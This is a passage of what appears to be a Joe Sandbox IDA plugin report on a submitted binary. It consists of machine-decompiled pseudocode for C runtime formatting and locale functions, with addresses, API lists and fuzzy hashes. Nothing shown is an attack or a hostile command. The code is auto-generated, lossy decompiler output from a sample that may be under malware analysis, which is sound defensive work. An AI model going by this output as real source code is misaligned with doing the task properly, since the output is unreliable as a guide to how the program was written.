                                                																		goto L103;
                                                																	}
                                                																	_t218 = _v36;
                                                																	__eflags = _t218;
                                                																	if(_t218 <= 0) {
                                                																		goto L103;
                                                																	} else {
                                                																		goto L95;
                                                																	}
                                                																	while(1) {
                                                																		L95:
                                                																		_t208 =  *_v28;
                                                																		__eflags =  *((intOrPtr*)(_t208 + 8)) -  *((intOrPtr*)(_t208 + 4));
                                                																		if( *((intOrPtr*)(_t208 + 8)) !=  *((intOrPtr*)(_t208 + 4))) {
                                                																			_t193 = _v28;
                                                																			 *_t216 = _t192 + 1;
                                                																			 *((intOrPtr*)(_t208 + 8)) =  *((intOrPtr*)(_t208 + 8)) + 1;
                                                																			 *( *( *_t193)) = 0x20;
                                                																			_t141 =  *_t193;
                                                																			 *_t141 =  *_t141 + 1;
                                                																			__eflags =  *_t141;
                                                																			_t192 =  *_t216;
                                                																		} else {
                                                																			__eflags =  *((char*)(_t208 + 0xc));
                                                																			if( *((char*)(_t208 + 0xc)) == 0) {
                                                																				_t192 = _t192 | 0xffffffff;
                                                																				__eflags = _t192;
                                                																			} else {
                                                																				_t192 = _t192 + 1;
                                                																			}
                                                																			 *_t216 = _t192;
                                                																		}
                                                																		__eflags = _t192 - 0xffffffff;
                                                																		if(_t192 == 0xffffffff) {
                                                																			goto L103;
                                                																		}
                                                																		_t179 = _t179 + 1;
                                                																		__eflags = _t179 - _t218;
                                                																		if(_t179 < _t218) {
                                                																			continue;
                                                																		}
                                                																		goto L103;
                                                																	}
                                                																	goto L103;
                                                																}
                                                																__eflags =  *((intOrPtr*)(_t218 + 0x34)) - _t179;
                                                																if( *((intOrPtr*)(_t218 + 0x34)) <= _t179) {
                                                																	goto L91;
                                                																}
                                                																_t194 =  *(_t218 + 0x30);
                                                																_v20 = _t179;
                                                																while(1) {
                                                																	_v24 = _t179;
                                                																	_v32 =  &(_t194[1]);
                                                																	_t145 = E001B707D( &_v24,  &_v16, 6,  *_t194 & 0x0000ffff,  *((intOrPtr*)(_t218 + 8)));
                                                																	_t221 = _t221 + 0x14;
                                                																	__eflags = _t145;
                                                																	if(_t145 != 0) {
                                                																		break;
                                                																	}
                                                																	__eflags = _v24 - _t145;
                                                																	if(_v24 == _t145) {
                                                																		break;
                                                																	}
                                                																	_push( *((intOrPtr*)(_t218 + 8)));
                                                																	E001AFA17(_t218 + 0x448,  &_v16, _v24, _t216);
                                                																	_t194 = _v32;
                                                																	_t149 = _v20 + 1;
                                                																	_v20 = _t149;
                                                																	__eflags = _t149 -  *((intOrPtr*)(_t218 + 0x34));
                                                																	if(_t149 !=  *((intOrPtr*)(_t218 + 0x34))) {
                                                																		continue;
                                                																	}
                                                																	goto L92;
                                                																}
                                                																 *_t216 =  *_t216 | 0xffffffff;
                                                																goto L92;
                                                															}
                                                															_t197 = _t190 >> 2;
                                                															__eflags = _t197 & 0x00000001;
                                                															if((_t197 & 0x00000001) != 0) {
                                                																goto L83;
                                                															}
                                                															_t198 = _v36;
                                                															_v20 = _t179;
                                                															__eflags = _t198;
                                                															if(_t198 <= 0) {
                                                																goto L83;
                                                															}
                                                															_t214 =  *_t216;
                                                															_t219 = _v28;
                                                															while(1) {
                                                																_t150 =  *_t219;
                                                																_v24 = _t150;
                                                																_t180 = _t150;
                                                																__eflags =  *((intOrPtr*)(_t150 + 8)) -  *((intOrPtr*)(_t180 + 4));
                                                																if( *((intOrPtr*)(_t150 + 8)) !=  *((intOrPtr*)(_t180 + 4))) {
                                                																	 *_t216 = _t214 + 1;
                                                																	 *((intOrPtr*)(_t180 + 8)) =  *((intOrPtr*)(_t180 + 8)) + 1;
                                                																	 *( *( *_t219)) = 0x30;
                                                																	_t156 =  *_t219;
                                                																	 *_t156 =  *_t156 + 1;
                                                																	__eflags =  *_t156;
                                                																	_t208 =  *_t216;
                                                																} else {
                                                																	_t159 = _t180;
                                                																	__eflags =  *((char*)(_t159 + 0xc));
                                                																	if( *((char*)(_t159 + 0xc)) == 0) {
                                                																		_t208 = _t208 | 0xffffffff;
                                                																		__eflags = _t208;
                                                																	} else {
                                                																		_t208 = _t208 + 1;
                                                																	}
                                                																	 *_t216 = _t208;
                                                																}
                                                																__eflags = _t208 - 0xffffffff;
                                                																if(_t208 == 0xffffffff) {
                                                																	break;
                                                																}
                                                																_t158 = _v20 + 1;
                                                																_v20 = _t158;
                                                																__eflags = _t158 - _t198;
                                                																if(_t158 < _t198) {
                                                																	continue;
                                                																}
                                                																break;
                                                															}
                                                															_t218 = _v32;
                                                															_t179 = 0;
                                                															__eflags = 0;
                                                															goto L83;
                                                														}
                                                														__eflags = _t208;
                                                														if(_t208 <= 0) {
                                                															goto L70;
                                                														}
                                                														_t217 =  *(_t218 + 0x14);
                                                														_t199 = _t179;
                                                														while(1) {
                                                															_t160 =  *(_t218 + 0x448);
                                                															_t181 =  *(_t218 + 0x448);
                                                															__eflags = _t160[2] - _t181[1];
                                                															if(_t160[2] != _t181[1]) {
                                                																 *(_t218 + 0x14) = _t217 + 1;
                                                																_t181[2] = _t181[2] + 1;
                                                																 *( *( *(_t218 + 0x448))) = 0x20;
                                                																_t166 =  *(_t218 + 0x448);
                                                																 *_t166 =  *_t166 + 1;
                                                																__eflags =  *_t166;
                                                																_t217 =  *(_t218 + 0x14);
                                                															} else {
                                                																__eflags = _t181[3];
                                                																if(_t181[3] == 0) {
                                                																	_t217 = _t217 | 0xffffffff;
                                                																	__eflags = _t217;
                                                																} else {
                                                																	_t217 = _t217 + 1;
                                                																}
                                                																 *(_t218 + 0x14) = _t217;
                                                															}
                                                															__eflags = _t217 - 0xffffffff;
                                                															if(_t217 == 0xffffffff) {
                                                																break;
                                                															}
                                                															_t199 = _t199 + 1;
                                                															__eflags = _t199 - _t208;
                                                															if(_t199 < _t208) {
                                                																continue;
                                                															}
                                                															break;
                                                														}
                                                														_t187 = _v28;
                                                														_t179 = 0;
                                                														__eflags = 0;
                                                														goto L70;
                                                													}
                                                													__eflags = _t211 - 0x41;
                                                													if(_t211 == 0x41) {
                                                														goto L56;
                                                													}
                                                													goto L57;
                                                												}
                                                												__eflags = _t127;
                                                												if(_t127 == 0) {
                                                													goto L58;
                                                												}
                                                												goto L53;
                                                											}
                                                											_t127 = _t179;
                                                											__eflags = _t211 - 0x41;
                                                											if(_t211 != 0x41) {
                                                												goto L51;
                                                											}
                                                											goto L50;
                                                										}
                                                										L47:
                                                										goto L48;
                                                									}
                                                									__eflags = _t211 - 0x58;
                                                									if(_t211 != 0x58) {
                                                										goto L47;
                                                									}
                                                									goto L46;
                                                								}
                                                								_t169 =  *(_t218 + 0x1c) >> 6;
                                                								__eflags = 1 & _t169;
                                                								if((1 & _t169) == 0) {
                                                									__eflags =  *(_t218 + 0x1c) & 1;
                                                									if(( *(_t218 + 0x1c) & 1) == 0) {
                                                										_t171 =  *(_t218 + 0x1c) >> 1;
                                                										__eflags = 1 & _t171;
                                                										if((1 & _t171) != 0) {
                                                											_v20 = 0x20;
                                                											_t187 = 1;
                                                											_v28 = 1;
                                                										}
                                                										goto L44;
                                                									}
                                                									_v20 = 0x2b;
                                                									L41:
                                                									_t187 = 1;
                                                									_v28 = 1;
                                                									goto L44;
                                                								}
                                                								_v20 = 0x2d;
                                                								goto L41;
                                                							}
                                                							L11:
                                                							_t120 = 0;
                                                							goto L105;
                                                						}
                                                						_t173 = _t118;
                                                						__eflags = _t173;
                                                						if(__eflags == 0) {
                                                							L28:
                                                							_t119 = E001AE3CE(_t218, __eflags, _t179);
                                                							goto L10;
                                                						}
                                                						__eflags = _t173 - 3;
                                                						if(__eflags != 0) {
                                                							goto L11;
                                                						}
                                                						_push(0);
                                                						L13:
                                                						_t119 = E001AE54B(_t218, __eflags);
                                                						goto L10;
                                                					}
                                                					if(__eflags == 0) {
                                                						_t119 = E001AF88E(__ecx);
                                                						goto L10;
                                                					}
                                                					__eflags = _t117 - 0x67;
                                                					if(_t117 <= 0x67) {
                                                						L29:
                                                						_t119 = E001AF5CE(_t179, _t218);
                                                						goto L10;
                                                					}
                                                					__eflags = _t117 - 0x69;
                                                					if(_t117 == 0x69) {
                                                						L27:
                                                						_t4 = _t218 + 0x1c;
                                                						 *_t4 =  *(_t218 + 0x1c) | 0x00000010;
                                                						__eflags =  *_t4;
                                                						goto L28;
                                                					}
                                                					__eflags = _t117 - 0x6e;
                                                					if(_t117 == 0x6e) {
                                                						_t119 = E001AF7ED(__ecx, __edx);
                                                						goto L10;
                                                					}
                                                					__eflags = _t117 - 0x6f;
                                                					if(_t117 != 0x6f) {
                                                						goto L11;
                                                					}
                                                					_t119 = E001AF871(__ecx);
                                                					goto L10;
                                                				}
                                                				if(_t222 == 0) {
                                                					goto L27;
                                                				}
                                                				_t223 = _t117 - _t183;
                                                				if(_t223 > 0) {
                                                					_t175 = _t117 - 0x5a;
                                                					__eflags = _t175;
                                                					if(_t175 == 0) {
                                                						_t119 = E001AF574(__ecx);
                                                						goto L10;
                                                					}
                                                					_t176 = _t175 - 7;
                                                					__eflags = _t176;
                                                					if(_t176 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _t176;
                                                					if(__eflags != 0) {
                                                						goto L11;
                                                					}
                                                					L17:
                                                					_t119 = E001AF758(_t179, _t218, __eflags, _t179);
                                                					goto L10;
                                                				}
                                                				if(_t223 == 0) {
                                                					_push(1);
                                                					goto L13;
                                                				}
                                                				if(_t117 == 0x41) {
                                                					goto L29;
                                                				}
                                                				if(_t117 == 0x43) {
                                                					goto L17;
                                                				}
                                                				if(_t117 <= 0x44) {
                                                					goto L11;
                                                				}
                                                				if(_t117 <= 0x47) {
                                                					goto L29;
                                                				}
                                                				if(_t117 != 0x53) {
                                                					goto L11;
                                                				}
                                                				goto L9;
                                                			}



























































                                                0x001af192
                                                0x001af192
                                                0x001af19a
                                                0x001af1a1
                                                0x001af1a6
                                                0x001af1a8
                                                0x001af1ac
                                                0x001af1af
                                                0x001af1b0
                                                0x001af1b4
                                                0x001af1b7
                                                0x001af22a
                                                0x001af22d
                                                0x001af27d
                                                0x001af27d
                                                0x001af280
                                                0x001af1e6
                                                0x001af1e8
                                                0x001af1ed
                                                0x001af1ef
                                                0x001af29b
                                                0x001af29e
                                                0x001af510
                                                0x001af510
                                                0x001af512
                                                0x001af51f
                                                0x001af51f
                                                0x001af2a9
                                                0x001af2ad
                                                0x001af2b1
                                                0x001af2b3
                                                0x001af2b6
                                                0x001af2b9
                                                0x001af2bb
                                                0x001af2ef
                                                0x001af2ef
                                                0x001af2f2
                                                0x001af2f5
                                                0x001af2fc
                                                0x001af304
                                                0x001af306
                                                0x001af30a
                                                0x001af30a
                                                0x001af30d
                                                0x001af316
                                                0x001af316
                                                0x001af318
                                                0x001af318
                                                0x001af31a
                                                0x001af320
                                                0x001af320
                                                0x001af325
                                                0x001af328
                                                0x001af333
                                                0x001af335
                                                0x001af336
                                                0x001af336
                                                0x001af33a
                                                0x001af33a
                                                0x001af33d
                                                0x001af340
                                                0x001af346
                                                0x001af348
                                                0x001af34c
                                                0x001af34d
                                                0x001af350
                                                0x001af3b0
                                                0x001af3b0
                                                0x001af3b3
                                                0x001af3c1
                                                0x001af3c7
                                                0x001af3cc
                                                0x001af3d1
                                                0x001af3d4
                                                0x001af3d6
                                                0x001af43c
                                                0x001af43c
                                                0x001af440
                                                0x001af4a4
                                                0x001af4a4
                                                0x001af4b4
                                                0x001af4b9
                                                0x001af4b9
                                                0x001af4bb
                                                0x001af4bd
                                                0x001af50f
                                                0x001af50f
                                                0x00000000
                                                0x001af50f
                                                0x001af4c2
                                                0x001af4c5
                                                0x001af4c7
                                                0x00000000
                                                0x00000000
                                                0x001af4c9
                                                0x001af4cc
                                                0x001af4ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af4d0
                                                0x001af4d0
                                                0x001af4d3
                                                0x001af4d8
                                                0x001af4db
                                                0x001af4f0
                                                0x001af4f3
                                                0x001af4f5
                                                0x001af4fc
                                                0x001af4ff
                                                0x001af501
                                                0x001af501
                                                0x001af503
                                                0x001af4dd
                                                0x001af4dd
                                                0x001af4e1
                                                0x001af4e6
                                                0x001af4e6
                                                0x001af4e3
                                                0x001af4e3
                                                0x001af4e3
                                                0x001af4e9
                                                0x001af4e9
                                                0x001af505
                                                0x001af508
                                                0x00000000
                                                0x00000000
                                                0x001af50a
                                                0x001af50b
                                                0x001af50d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af50d
                                                0x00000000
                                                0x001af4d0
                                                0x001af442
                                                0x001af445
                                                0x00000000
                                                0x00000000
                                                0x001af447
                                                0x001af44a
                                                0x001af44d
                                                0x001af45c
                                                0x001af463
                                                0x001af467
                                                0x001af46c
                                                0x001af46f
                                                0x001af471
                                                0x00000000
                                                0x00000000
                                                0x001af473
                                                0x001af476
                                                0x00000000
                                                0x00000000
                                                0x001af478
                                                0x001af489
                                                0x001af491
                                                0x001af494
                                                0x001af495
                                                0x001af498
                                                0x001af49b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af49d
                                                0x001af49f
                                                0x00000000
                                                0x001af49f
                                                0x001af3d8
                                                0x001af3db
                                                0x001af3de
                                                0x00000000
                                                0x00000000
                                                0x001af3e0
                                                0x001af3e3
                                                0x001af3e6
                                                0x001af3e8
                                                0x00000000
                                                0x00000000
                                                0x001af3ea
                                                0x001af3ec
                                                0x001af3ef
                                                0x001af3ef
                                                0x001af3f1
                                                0x001af3f4
                                                0x001af3f9
                                                0x001af3fc
                                                0x001af413
                                                0x001af417
                                                0x001af41e
                                                0x001af421
                                                0x001af423
                                                0x001af423
                                                0x001af425
                                                0x001af3fe
                                                0x001af3fe
                                                0x001af400
                                                0x001af404
                                                0x001af409
                                                0x001af409
                                                0x001af406
                                                0x001af406
                                                0x001af406
                                                0x001af40c
                                                0x001af40c
                                                0x001af427
                                                0x001af42a
                                                0x00000000
                                                0x00000000
                                                0x001af42f
                                                0x001af430
                                                0x001af433
                                                0x001af435
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af435
                                                0x001af437
                                                0x001af43a
                                                0x001af43a
                                                0x00000000
                                                0x001af43a
                                                0x001af352
                                                0x001af354
                                                0x00000000
                                                0x00000000
                                                0x001af356
                                                0x001af359
                                                0x001af35b
                                                0x001af35b
                                                0x001af361
                                                0x001af36a
                                                0x001af36d
                                                0x001af383
                                                0x001af388
                                                0x001af393
                                                0x001af396
                                                0x001af39c
                                                0x001af39c
                                                0x001af39e
                                                0x001af36f
                                                0x001af36f
                                                0x001af373
                                                0x001af378
                                                0x001af378
                                                0x001af375
                                                0x001af375
                                                0x001af375
                                                0x001af37b
                                                0x001af37b
                                                0x001af3a1
                                                0x001af3a4
                                                0x00000000
                                                0x00000000
                                                0x001af3a6
                                                0x001af3a7
                                                0x001af3a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af3a9
                                                0x001af3ab
                                                0x001af3ae
                                                0x001af3ae
                                                0x00000000
                                                0x001af3ae
                                                0x001af32a
                                                0x001af32d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af32f
                                                0x001af31c
                                                0x001af31e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af31e
                                                0x001af30f
                                                0x001af311
                                                0x001af314
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af314
                                                0x001af308
                                                0x00000000
                                                0x001af308
                                                0x001af2f7
                                                0x001af2fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001af2fa
                                                0x001af2c0
                                                0x001af2c3
                                                0x001af2c5
                                                0x001af2cd
                                                0x001af2d0
                                                0x001af2e0
                                                0x001af2e2
                                                0x001af2e4
                                                0x001af2e6
                                                0x001af2ea
                                                0x001af2ec
                                                0x001af2ec
                                                0x00000000
                                                0x001af2e4
                                                0x001af2d2
                                                0x001af2d6
                                                0x001af2d6
                                                0x001af2d8
                                                0x00000000
                                                0x001af2d8
                                                0x001af2c7
                                                0x00000000
                                                0x001af2c7
                                                0x001af1f5
                                                0x001af1f5
                                                0x00000000
                                                0x001af1f5
                                                0x001af287
                                                0x001af287
                                                0x001af28a
                                                0x001af25b
                                                0x001af25e
                                                0x00000000
                                                0x001af25e
                                                0x001af28c
                                                0x001af28f
                                                0x00000000
                                                0x00000000
                                                0x001af295
                                                0x001af1fe
                                                0x001af200
                                                0x00000000
                                                0x001af200
                                                0x001af22f
                                                0x001af273
                                                0x00000000
                                                0x001af273
                                                0x001af231
                                                0x001af234
                                                0x001af265
                                                0x001af267
                                                0x00000000
                                                0x001af267
                                                0x001af236
                                                0x001af239
                                                0x001af257
                                                0x001af257
                                                0x001af257
                                                0x001af257
                                                0x00000000
                                                0x001af257
                                                0x001af23b
                                                0x001af23e
                                                0x001af250
                                                0x00000000
                                                0x001af250
                                                0x001af240
                                                0x001af243
                                                0x00000000
                                                0x00000000
                                                0x001af247
                                                0x00000000
                                                0x001af247
                                                0x001af1b9
                                                0x00000000
                                                0x00000000
                                                0x001af1bf
                                                0x001af1c1
                                                0x001af207
                                                0x001af207
                                                0x001af20a
                                                0x001af223
                                                0x00000000
                                                0x001af223
                                                0x001af20c
                                                0x001af20c
                                                0x001af20f
                                                0x00000000
                                                0x00000000
                                                0x001af212
                                                0x001af215
                                                0x00000000
                                                0x00000000
                                                0x001af217
                                                0x001af21a
                                                0x00000000
                                                0x001af21a
                                                0x001af1c3
                                                0x001af1fc
                                                0x00000000
                                                0x001af1fc
                                                0x001af1c8
                                                0x00000000
                                                0x00000000
                                                0x001af1d1
                                                0x00000000
                                                0x00000000
                                                0x001af1d6
                                                0x00000000
                                                0x00000000
                                                0x001af1db
                                                0x00000000
                                                0x00000000
                                                0x001af1e4
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 1636bf58d41346b0466d06ec367d0e513563f2fcd98564c5848b78b65dfcadf8
                                                • Instruction ID: e6b8d9f295fe675aa1848f6192df8251e0bca616d07dfcbfd1ac79acc1c6921c
                                                • Opcode Fuzzy Hash: 1636bf58d41346b0466d06ec367d0e513563f2fcd98564c5848b78b65dfcadf8
                                                • Instruction Fuzzy Hash: 16C1AB7CA006468FCB28CFA8C4806BEBBA1BF5B314F24462ED49697691D730ED47CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E001C15BA(void* __ecx, void* __edx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				short _v248;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t15;
                                                				signed int _t21;
                                                				void* _t23;
                                                				void* _t30;
                                                				void* _t32;
                                                				signed int _t41;
                                                				signed int* _t47;
                                                				int _t49;
                                                				signed int _t50;
                                                
                                                				_t46 = __edx;
                                                				_t15 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t15 ^ _t50;
                                                				_t48 = _a4;
                                                				_t32 = E001B782A(__ecx, __edx, _a4);
                                                				_t47 =  *(E001B782A(__ecx, __edx, _a4) + 0x34c);
                                                				_t49 = E001C168F(_t48);
                                                				asm("sbb ecx, ecx");
                                                				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                                				if(_t21 != 0) {
                                                					_t23 = E001BDE74(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                					_t41 =  *(_t32 + 0x60);
                                                					if(_t23 != 0) {
                                                						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
                                                							_t30 = E001BDE74(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
                                                							if(_t30 == 0) {
                                                								_push(_t47);
                                                								_push(_t30);
                                                								goto L9;
                                                							}
                                                						}
                                                					} else {
                                                						if(_t41 != 0) {
                                                							L10:
                                                							 *_t47 =  *_t47 | 0x00000004;
                                                							_t47[1] = _t49;
                                                							_t47[2] = _t49;
                                                						} else {
                                                							_push(_t47);
                                                							_push(1);
                                                							L9:
                                                							_push(_t49);
                                                							if(E001C17E9() != 0) {
                                                								goto L10;
                                                							}
                                                						}
                                                					}
                                                					_t27 =  !( *_t47 >> 2) & 0x00000001;
                                                				} else {
                                                					 *_t47 =  *_t47 & _t21;
                                                					_t27 = _t21 + 1;
                                                				}
                                                				return E001A9545(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
                                                			}

















                                                0x001c15ba
                                                0x001c15c5
                                                0x001c15cc
                                                0x001c15d1
                                                0x001c15da
                                                0x001c15e2
                                                0x001c15f1
                                                0x001c15fd
                                                0x001c160e
                                                0x001c1616
                                                0x001c1627
                                                0x001c162e
                                                0x001c1633
                                                0x001c1640
                                                0x001c1651
                                                0x001c165a
                                                0x001c165c
                                                0x001c165d
                                                0x00000000
                                                0x001c165d
                                                0x001c165a
                                                0x001c1635
                                                0x001c1637
                                                0x001c166b
                                                0x001c166b
                                                0x001c166e
                                                0x001c1671
                                                0x001c1639
                                                0x001c1639
                                                0x001c163a
                                                0x001c165e
                                                0x001c165e
                                                0x001c1669
                                                0x00000000
                                                0x00000000
                                                0x001c1669
                                                0x001c1637
                                                0x001c167b
                                                0x001c1618
                                                0x001c1618
                                                0x001c161a
                                                0x001c161a
                                                0x001c168c

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C160E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: a9a8eb75653d98a743b563184ec87456af298b7afeb52f49119fd4968bb9b121
                                                • Instruction ID: 17d6fde96be878146f903eec0b8953b6ac5fb151889c294d46ced10786c9896b
                                                • Opcode Fuzzy Hash: a9a8eb75653d98a743b563184ec87456af298b7afeb52f49119fd4968bb9b121
                                                • Instruction Fuzzy Hash: 6221B072644216ABDB289A25DC46FBA73A8EF66311B14017EFD01C6182FBB4ED44CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E001C1241(void* __ecx, void* __edx, signed int* _a4) {
                                                				void* __esi;
                                                				intOrPtr _t26;
                                                				intOrPtr _t29;
                                                				signed int _t32;
                                                				signed char _t33;
                                                				signed char _t34;
                                                				intOrPtr* _t38;
                                                				intOrPtr* _t41;
                                                				signed int _t47;
                                                				void* _t50;
                                                				void* _t51;
                                                				signed int* _t52;
                                                				void* _t53;
                                                				void* _t54;
                                                				signed int _t62;
                                                
                                                				_t54 = E001B782A(__ecx, __edx, _t53);
                                                				_t47 = 2;
                                                				_t38 =  *((intOrPtr*)(_t54 + 0x50));
                                                				_t50 = _t38 + 2;
                                                				do {
                                                					_t26 =  *_t38;
                                                					_t38 = _t38 + _t47;
                                                				} while (_t26 != 0);
                                                				_t41 =  *((intOrPtr*)(_t54 + 0x54));
                                                				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
                                                				_t51 = _t41 + 2;
                                                				do {
                                                					_t29 =  *_t41;
                                                					_t41 = _t41 + _t47;
                                                				} while (_t29 != 0);
                                                				_t52 = _a4;
                                                				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
                                                				_t52[1] = 0;
                                                				if( *(_t54 + 0x60) == 0) {
                                                					_t47 = E001C133B( *((intOrPtr*)(_t54 + 0x50)));
                                                				}
                                                				 *(_t54 + 0x5c) = _t47;
                                                				_t32 = EnumSystemLocalesW(E001C1367, 1);
                                                				_t62 =  *_t52 & 0x00000007;
                                                				asm("bt ecx, 0x9");
                                                				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                                                				asm("bt ecx, 0x8");
                                                				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                                                				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                                                					 *_t52 = 0;
                                                					return _t34;
                                                				}
                                                				return _t34;
                                                			}


















                                                0x001c124e
                                                0x001c1254
                                                0x001c1255
                                                0x001c1258
                                                0x001c125b
                                                0x001c125b
                                                0x001c125e
                                                0x001c1260
                                                0x001c126e
                                                0x001c1274
                                                0x001c1277
                                                0x001c127a
                                                0x001c127a
                                                0x001c127d
                                                0x001c127f
                                                0x001c1288
                                                0x001c1293
                                                0x001c1296
                                                0x001c129c
                                                0x001c12a7
                                                0x001c12a7
                                                0x001c12b0
                                                0x001c12b3
                                                0x001c12bb
                                                0x001c12c1
                                                0x001c12c5
                                                0x001c12ca
                                                0x001c12ce
                                                0x001c12d3
                                                0x001c12d5
                                                0x00000000
                                                0x001c12d5
                                                0x001c12db

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • EnumSystemLocalesW.KERNEL32(001C1367,00000001,00000000,?,-00000050,?,001C1998,00000000,?,?,?,00000055,?), ref: 001C12B3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 0a86de133fd63810f1ae086fb1be72e58d888571f35a29ae3f3900c3c2328f67
                                                • Instruction ID: 0b3bb114c15d7f39c77f731081dcf1e7aa3c98c7e86ed9f7fd84d44bece6f870
                                                • Opcode Fuzzy Hash: 0a86de133fd63810f1ae086fb1be72e58d888571f35a29ae3f3900c3c2328f67
                                                • Instruction Fuzzy Hash: 4511293B2043016FDB189F39C891ABAB7A1FF95728B14442DEA8787B41D371E943C740
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E001C17E9(signed int _a4, intOrPtr _a8) {
                                                				short _v8;
                                                				void* __ecx;
                                                				void* __esi;
                                                				void* _t8;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				void* _t15;
                                                				void* _t19;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				signed int _t26;
                                                				intOrPtr* _t28;
                                                
                                                				_push(_t15);
                                                				_push(_t25);
                                                				_t8 = E001B782A(_t15, _t21, _t25);
                                                				_t26 = _a4;
                                                				_t23 = _t8;
                                                				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
                                                					L7:
                                                					_t11 = 0;
                                                				} else {
                                                					if(_t26 == _v8 || _a8 == 0) {
                                                						L6:
                                                						_t11 = 1;
                                                					} else {
                                                						_t28 =  *((intOrPtr*)(_t23 + 0x50));
                                                						_t19 = _t28 + 2;
                                                						do {
                                                							_t13 =  *_t28;
                                                							_t28 = _t28 + 2;
                                                						} while (_t13 != 0);
                                                						if(E001C133B( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
                                                							goto L7;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t11;
                                                			}
















                                                0x001c17ee
                                                0x001c17ef
                                                0x001c17f1
                                                0x001c17f6
                                                0x001c17f9
                                                0x001c181d
                                                0x001c1851
                                                0x001c1851
                                                0x001c181f
                                                0x001c1822
                                                0x001c184c
                                                0x001c184e
                                                0x001c182a
                                                0x001c182a
                                                0x001c182d
                                                0x001c1830
                                                0x001c1830
                                                0x001c1833
                                                0x001c1836
                                                0x001c184a
                                                0x00000000
                                                0x00000000
